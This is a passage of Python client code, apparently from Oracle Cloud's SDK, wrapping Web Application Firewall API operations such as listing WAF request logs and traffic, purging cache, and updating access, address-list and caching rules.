            if item not in allowed_http_methods:
                raise ValueError(
                    "Invalid value for `http_method`, must be one of {0}".format(allowed_http_methods)
                )

    if 'log_type' in kwargs:
        allowed_log_types = ["ACCESS", "PROTECTION_RULES", "JS_CHALLENGE", "CAPTCHA", "ACCESS_RULES", "THREAT_FEEDS", "HUMAN_INTERACTION_CHALLENGE", "DEVICE_FINGERPRINT_CHALLENGE", "ADDRESS_RATE_LIMITING"]
        for item in kwargs['log_type']:
            if item not in allowed_log_types:
                raise ValueError(
                    "Invalid value for `log_type`, must be one of {0}".format(allowed_log_types)
                )

    # Repeated (multi) query parameters are expanded by the base client.
    multi = self.base_client.generate_collection_format_param
    candidate_query = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
        "timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
        "textContains": kwargs.get("text_contains", missing),
        "accessRuleKey": multi(kwargs.get("access_rule_key", missing), 'multi'),
        "action": multi(kwargs.get("action", missing), 'multi'),
        "clientAddress": multi(kwargs.get("client_address", missing), 'multi'),
        "countryCode": multi(kwargs.get("country_code", missing), 'multi'),
        "countryName": multi(kwargs.get("country_name", missing), 'multi'),
        "fingerprint": multi(kwargs.get("fingerprint", missing), 'multi'),
        "httpMethod": multi(kwargs.get("http_method", missing), 'multi'),
        "incidentKey": multi(kwargs.get("incident_key", missing), 'multi'),
        "logType": multi(kwargs.get("log_type", missing), 'multi'),
        "originAddress": multi(kwargs.get("origin_address", missing), 'multi'),
        "referrer": multi(kwargs.get("referrer", missing), 'multi'),
        "requestUrl": multi(kwargs.get("request_url", missing), 'multi'),
        "responseCode": multi(kwargs.get("response_code", missing), 'multi'),
        "threatFeedKey": multi(kwargs.get("threat_feed_key", missing), 'multi'),
        "userAgent": multi(kwargs.get("user_agent", missing), 'multi'),
        "protectionRuleKey": multi(kwargs.get("protection_rule_key", missing), 'multi')
    }
    query_params = {name: value for (name, value) in six.iteritems(candidate_query)
                    if value is not missing and value is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    opc_request_id = kwargs.get("opc_request_id", missing)
    if opc_request_id is not missing and opc_request_id is not None:
        header_params["opc-request-id"] = opc_request_id

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WafLog]")

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        # Mutates header_params in place before the request is issued.
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def list_waf_requests(self, waas_policy_id, **kwargs):
    """
    Gets the number of requests managed by a Web Application Firewall
    over a specified period of time, including blocked requests. Results
    are sorted by `timeObserved` in ascending order (oldest first).

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param datetime time_observed_greater_than_or_equal_to: (optional)
        A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.

    :param datetime time_observed_less_than: (optional)
        A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafRequest`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/requests"
    method = "GET"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "time_observed_greater_than_or_equal_to",
        "time_observed_less_than",
        "limit",
        "page"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_waf_requests got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Optional query parameters; unsupplied ones are dropped below.
    query_params = {
        "timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
        "timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in query_params.items() if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WafRequest]")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def list_waf_traffic(self, waas_policy_id, **kwargs):
    """
    Gets the Web Application Firewall traffic data for a WAAS policy,
    sorted by `timeObserved` in ascending order (oldest data first).

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param datetime time_observed_greater_than_or_equal_to: (optional)
        A filter that limits returned events to those occurring on or after a date and time, specified in RFC 3339 format. If unspecified, defaults to 30 minutes before receipt of the request.

    :param datetime time_observed_less_than: (optional)
        A filter that limits returned events to those occurring before a date and time, specified in RFC 3339 format.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WafTrafficDatum`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/reports/waf/traffic"
    method = "GET"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "time_observed_greater_than_or_equal_to",
        "time_observed_less_than",
        "limit",
        "page"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_waf_traffic got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Optional query parameters; unsupplied ones are dropped below.
    query_params = {
        "timeObservedGreaterThanOrEqualTo": kwargs.get("time_observed_greater_than_or_equal_to", missing),
        "timeObservedLessThan": kwargs.get("time_observed_less_than", missing),
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in query_params.items() if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[WafTrafficDatum]")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def list_whitelists(self, waas_policy_id, **kwargs):
    """
    Gets the list of whitelists defined in the Web Application Firewall
    configuration for a WAAS policy.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.Whitelist`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/whitelists"
    method = "GET"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_whitelists got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Optional pagination query parameters; unsupplied ones are dropped below.
    query_params = {
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing)
    }
    query_params = {k: v for (k, v) in query_params.items() if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        query_params=query_params,
        header_params=header_params,
        response_type="list[Whitelist]")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def list_work_requests(self, waas_policy_id, compartment_id, **kwargs):
    """
    Gets a list of the work requests for the specified WAAS policy in the
    given compartment. Work requests track the progress of long-running,
    asynchronous WAAS operations. By default results are sorted by
    `timeAccepted` in descending order.

    (NOTE(review): the previous docstring described ListEdgeSubnets — "Gets a
    list of subnets (CIDR notation)..." — which does not match this operation:
    the code below calls GET /workRequests and returns WorkRequestSummary
    items.)

    :param str waas_policy_id: (required)
        The `OCID`__ of the policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str compartment_id: (required)
        The `OCID`__ of the compartment. This number is generated when the compartment is created.

        __ https://docs.cloud.oracle.com/iaas/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param int limit: (optional)
        The maximum number of items to return in a paginated call. If unspecified, defaults to `10`.

    :param str page: (optional)
        The value of the `opc-next-page` response header from the previous paginated call.

    :param str sort_by: (optional)
        The value by which work requests are sorted in a paginated 'List' call. If unspecified, defaults to `timeAccepted`.

        Allowed values are: "id", "status", "timeAccepted", "timeStarted", "timeFinished", "operationType"

    :param str sort_order: (optional)
        The value of the sorting direction of resources in a paginated 'List' call. If unspecified, defaults to `DESC`.

        Allowed values are: "ASC", "DESC"

    :param obj retry_strategy: (optional)
        A retry strategy to apply to this specific operation/call. This will override any retry strategy set at the client-level.

        This should be one of the strategies available in the :py:mod:`~oci.retry` module. This operation will not retry by default, users can also use the convenient :py:data:`~oci.retry.DEFAULT_RETRY_STRATEGY` provided by the SDK to enable retries for it.
        The specifics of the default retry strategy are described `here <https://docs.oracle.com/en-us/iaas/tools/python/latest/sdk_behaviors/retries.html>`__.

        To have this operation explicitly not perform any retries, pass an instance of :py:class:`~oci.retry.NoneRetryStrategy`.

    :param bool allow_control_chars: (optional)
        allow_control_chars is a boolean to indicate whether or not this request should allow control characters in the response object.
        By default, the response will not allow control characters in strings

    :return: A :class:`~oci.response.Response` object with data of type list of :class:`~oci.waas.models.WorkRequestSummary`
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/list_work_requests.py.html>`__ to see an example of how to use list_work_requests API.
    """
    resource_path = "/workRequests"
    method = "GET"

    # Don't accept unknown kwargs
    expected_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "limit",
        "page",
        "sort_by",
        "sort_order"
    ]
    extra_kwargs = [_key for _key in six.iterkeys(kwargs) if _key not in expected_kwargs]
    if extra_kwargs:
        raise ValueError(
            "list_work_requests got unknown kwargs: {!r}".format(extra_kwargs))

    # Validate enum-valued sort parameters before issuing the request.
    if 'sort_by' in kwargs:
        sort_by_allowed_values = ["id", "status", "timeAccepted", "timeStarted", "timeFinished", "operationType"]
        if kwargs['sort_by'] not in sort_by_allowed_values:
            raise ValueError(
                "Invalid value for `sort_by`, must be one of {0}".format(sort_by_allowed_values)
            )

    if 'sort_order' in kwargs:
        sort_order_allowed_values = ["ASC", "DESC"]
        if kwargs['sort_order'] not in sort_order_allowed_values:
            raise ValueError(
                "Invalid value for `sort_order`, must be one of {0}".format(sort_order_allowed_values)
            )

    # Both required identifiers are sent as query (not path) parameters;
    # optional ones that were not supplied are filtered out below.
    query_params = {
        "waasPolicyId": waas_policy_id,
        "compartmentId": compartment_id,
        "limit": kwargs.get("limit", missing),
        "page": kwargs.get("page", missing),
        "sortBy": kwargs.get("sort_by", missing),
        "sortOrder": kwargs.get("sort_order", missing)
    }
    query_params = {k: v for (k, v) in six.iteritems(query_params) if v is not missing and v is not None}

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing)
    }
    header_params = {k: v for (k, v) in six.iteritems(header_params) if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api,
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="list[WorkRequestSummary]")
    else:
        return self.base_client.call_api(
            resource_path=resource_path,
            method=method,
            query_params=query_params,
            header_params=header_params,
            response_type="list[WorkRequestSummary]")
def purge_cache(self, waas_policy_id, **kwargs):
    """
    Performs a purge of the cache for each specified resource. If no
    resources are passed, the cache for the entire Web Application Firewall
    will be purged. For more information, see `Caching Rules`__.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/cachingrules.htm#purge

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param str if_match: (optional)
        For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.

    :param oci.waas.models.PurgeCache purge_cache: (optional)

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/actions/purgeCache"
    method = "POST"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match",
        "purge_cache"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "purge_cache got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation; the
    # optional PurgeCache model (if supplied) is sent as the request body.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=kwargs.get('purge_cache'))

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def update_access_rules(self, waas_policy_id, access_rules, **kwargs):
    """
    Updates the list of access rules in the Web Application Firewall
    configuration for a specified WAAS policy. Access rules allow explicit
    actions to be defined and executed for requests that meet various
    conditions. A rule action can be set to allow, detect, or block
    requests. The detect setting allows the request to pass through the Web
    Application Firewall and is tagged with a `DETECT` flag in the Web
    Application Firewall's log.

    This operation can create, delete, update, and/or reorder access rules
    depending on the structure of the request body: rules with a `key` are
    updated in place (and reordered to match the list order), rules without
    a `key` are created (a key is generated on update), and existing rules
    omitted from the list are deleted.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[AccessRule] access_rules: (required)

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param str opc_retry_token: (optional)
        A token that uniquely identifies a request so it can be retried in case of a timeout or server error without risk of executing that same action again. Retry tokens expire after 24 hours, but can be invalidated before then due to conflicting operations.

    :param str if_match: (optional)
        For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/accessRules"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "update_access_rules got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"waasPolicyId": waas_policy_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "opc-retry-token": kwargs.get("opc_retry_token", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation; the
    # full list of access rules forms the request body.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=access_rules)

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            # A retry token is only generated when retries may actually occur.
            self.base_client.add_opc_retry_token_if_needed(header_params)
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def update_address_list(self, address_list_id, **kwargs):
    """
    Updates the details of an address list. Only the fields specified in
    the request body will be updated; all other properties will remain
    unchanged.

    :param str address_list_id: (required)
        The `OCID`__ of the address list. This number is generated when the address list is added to the compartment.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param str opc_request_id: (optional)
        The unique Oracle-assigned identifier for the request. If you need to contact Oracle about a particular request, please provide the request ID.

    :param str if_match: (optional)
        For optimistic concurrency control. In the `PUT` or `DELETE` call for a resource, set the `if-match` parameter to the value of the etag from a previous `GET` or `POST` response for that resource. The resource will be updated or deleted only if the etag provided matches the resource's current etag value.

    :param oci.waas.models.UpdateAddressListDetails update_address_list_details: (optional)
        The details of the address list to update.

    :param obj retry_strategy: (optional)
        A retry strategy (from the :py:mod:`~oci.retry` module) applied to this
        call only, overriding any client-level strategy. This operation does not
        retry by default; pass an instance of
        :py:class:`~oci.retry.NoneRetryStrategy` to explicitly disable retries.

    :param bool allow_control_chars: (optional)
        Whether strings in the response object may contain control characters.
        Defaults to False.

    :return: A :class:`~oci.response.Response` object with data of type :class:`~oci.waas.models.AddressList`
    :rtype: :class:`~oci.response.Response`
    """
    resource_path = "/addressLists/{addressListId}"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    allowed_kwargs = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "if_match",
        "update_address_list_details"
    ]
    extra_kwargs = [_key for _key in kwargs if _key not in allowed_kwargs]
    if extra_kwargs:
        raise ValueError(
            "update_address_list got unknown kwargs: {!r}".format(extra_kwargs))

    # Path parameters must be present and non-blank.
    path_params = {"addressListId": address_list_id}
    path_params = {k: v for (k, v) in path_params.items() if v is not missing}
    for name, value in path_params.items():
        if value is None or (isinstance(value, six.string_types) and not value.strip()):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    header_params = {
        "accept": "application/json",
        "content-type": "application/json",
        "opc-request-id": kwargs.get("opc_request_id", missing),
        "if-match": kwargs.get("if_match", missing)
    }
    header_params = {k: v for (k, v) in header_params.items() if v is not missing and v is not None}

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    # Arguments shared by the retrying and non-retrying invocation; the
    # optional update model (if supplied) is sent as the request body.
    call_api_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=kwargs.get('update_address_list_details'),
        response_type="AddressList")

    if retry_strategy:
        if not isinstance(retry_strategy, retry.NoneRetryStrategy):
            self.base_client.add_opc_client_retries_header(header_params)
            retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
        return retry_strategy.make_retrying_call(
            self.base_client.call_api, **call_api_kwargs)
    return self.base_client.call_api(**call_api_kwargs)
def update_caching_rules(self, waas_policy_id, caching_rules_details, **kwargs):
    """
    Updates the configuration for each specified caching rule.

    Caching rules in WAF policies allow selective caching of content on Oracle
    Cloud Infrastructure's edge servers. This operation can create, delete,
    update, and/or reorder caching rules depending on the request body: rules
    are matched by their ``key`` field, rules without a ``key`` are created,
    and existing rules omitted from the list are deleted. Rule order matters —
    the first matching rule wins.

    __ https://docs.cloud.oracle.com/iaas/Content/WAF/Tasks/cachingrules.htm

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

        __ https://docs.cloud.oracle.com/Content/General/Concepts/identifiers.htm

    :param oci.waas.models.list[CachingRule] caching_rules_details: (required)

    :param str opc_request_id: (optional)
        Unique Oracle-assigned identifier for the request.

    :param str opc_retry_token: (optional)
        Token that uniquely identifies a request so it can be retried safely
        after a timeout or server error. Tokens expire after 24 hours.

    :param str if_match: (optional)
        Etag for optimistic concurrency control; the update only proceeds if
        it matches the resource's current etag.

    :param obj retry_strategy: (optional)
        Retry strategy for this call, overriding the client-level strategy.
        Pass :py:class:`~oci.retry.NoneRetryStrategy` to disable retries.

    :param bool allow_control_chars: (optional)
        Whether control characters are allowed in response strings.

    :return: A :class:`~oci.response.Response` object with data of type None
    :rtype: :class:`~oci.response.Response`

    :example:
        Click `here <https://docs.cloud.oracle.com/en-us/iaas/tools/python-sdk-examples/latest/waas/update_caching_rules.py.html>`__ to see an example of how to use update_caching_rules API.
    """
    resource_path = "/waasPolicies/{waasPolicyId}/wafConfig/cachingRules"
    method = "PUT"

    # Reject any keyword argument this operation does not understand.
    accepted = [
        "allow_control_chars",
        "retry_strategy",
        "opc_request_id",
        "opc_retry_token",
        "if_match"
    ]
    unexpected = [name for name in six.iterkeys(kwargs) if name not in accepted]
    if unexpected:
        raise ValueError(
            "update_caching_rules got unknown kwargs: {!r}".format(unexpected))

    # Path parameters must be present and non-blank.
    path_params = {}
    if waas_policy_id is not missing:
        path_params["waasPolicyId"] = waas_policy_id
    for name, value in six.iteritems(path_params):
        if value is None or (isinstance(value, six.string_types) and len(value.strip()) == 0):
            raise ValueError('Parameter {} cannot be None, whitespace or empty string'.format(name))

    # Only forward headers the caller actually supplied.
    header_params = {
        "accept": "application/json",
        "content-type": "application/json"
    }
    for header_name, kwarg_name in (("opc-request-id", "opc_request_id"),
                                    ("opc-retry-token", "opc_retry_token"),
                                    ("if-match", "if_match")):
        value = kwargs.get(kwarg_name, missing)
        if value is not missing and value is not None:
            header_params[header_name] = value

    call_kwargs = dict(
        resource_path=resource_path,
        method=method,
        path_params=path_params,
        header_params=header_params,
        body=caching_rules_details)

    retry_strategy = self.base_client.get_preferred_retry_strategy(
        operation_retry_strategy=kwargs.get('retry_strategy'),
        client_retry_strategy=self.retry_strategy
    )

    if not retry_strategy:
        return self.base_client.call_api(**call_kwargs)

    if not isinstance(retry_strategy, retry.NoneRetryStrategy):
        self.base_client.add_opc_retry_token_if_needed(header_params)
        self.base_client.add_opc_client_retries_header(header_params)
        retry_strategy.add_circuit_breaker_callback(self.circuit_breaker_callback)
    return retry_strategy.make_retrying_call(self.base_client.call_api, **call_kwargs)
def update_captchas(self, waas_policy_id, captchas, **kwargs):
    """
    Updates the list of CAPTCHA challenges in the Web Application Firewall
    configuration for a WAAS policy.

    This operation can create, update, or delete CAPTCHAs depending on the
    request body: challenges are matched (and reordered) by their ``key``
    field, entries without a ``key`` are created, and existing challenges
    omitted from the list are deleted. Query parameters are allowed in
    CAPTCHA URLs.

    :param str waas_policy_id: (required)
        The `OCID`__ of the WAAS policy.

